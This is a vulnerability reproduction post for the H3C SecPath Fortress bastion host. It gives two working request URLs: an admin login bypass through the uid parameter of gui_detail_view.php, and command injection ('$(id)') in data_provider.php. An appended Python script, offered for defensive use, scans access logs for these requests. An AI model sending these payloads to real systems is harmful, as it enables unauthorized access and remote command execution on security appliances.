H3C SecPath Fortress get_detail_view.php Any User Login Vulnerability
Vulnerability Description
H3C SecPath Fortress data_provider.php has a remote command execution vulnerability. An attacker can execute commands by sending a specially constructed request after logging in as any user or entering the back end with an account and password.
Vulnerability Impact
H3C SecPath Fortress
Network surveying and mapping
Vulnerability Reproduction
The login page is as follows
First, obtain cookies by logging in as any user:
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true
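Added example (not part of the original post and not H3C code): a Python check that scans web access logs for the two request shapes shown above. The combined log format, the constructed sample lines and the rule that a legitimate uid is a plain identifier are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Command substitution / chaining characters that have no place in a report filter.
SHELL_META = re.compile(r"\$\(|`|[;|&<>\n\r]")
# Assumption: a legitimate uid is a short plain identifier.
SAFE_UID = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")
# Request field of a common/combined log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_target(target):
    """Return a list of findings for one request target (path plus query)."""
    parts = urlsplit(target)
    # parse_qsl percent-decodes values, so encoded payloads are checked in clear form.
    params = parse_qsl(parts.query, keep_blank_values=True)
    findings = []
    if parts.path.endswith("/audit/gui_detail_view.php"):
        for name, value in params:
            if name == "uid" and not SAFE_UID.match(value):
                findings.append("gui_detail_view.php: uid is not a plain identifier")
    elif parts.path.endswith("/audit/data_provider.php"):
        for name, value in params:
            if SHELL_META.search(value):
                findings.append(f"data_provider.php: shell metacharacters in '{name}'")
    return findings

def scan(log_lines):
    """Return (line_number, finding) pairs for every suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, f) for f in inspect_target(match.group(1)))
    return hits

# Constructed sample log lines (documentation addresses, not captured traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Apr/2019:09:40:01 +0800] "GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1" 200 3',
    '198.51.100.7 - - [02/Apr/2019:09:40:05 +0800] "GET /audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true HTTP/1.1" 200 512',
    '192.0.2.10 - - [02/Apr/2019:09:41:12 +0800] "GET /audit/data_provider.php?ds_y=2019&ds_m=04&service=ssh&query_type=all&format=json HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(f"line {number}: {finding}")
```

A hit on gui_detail_view.php followed by data_provider.php traffic from the same client is worth correlating, since the post describes the first request as the way to obtain the cookie used by the second.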
This post is licensed under CC BY 4.0 by the author.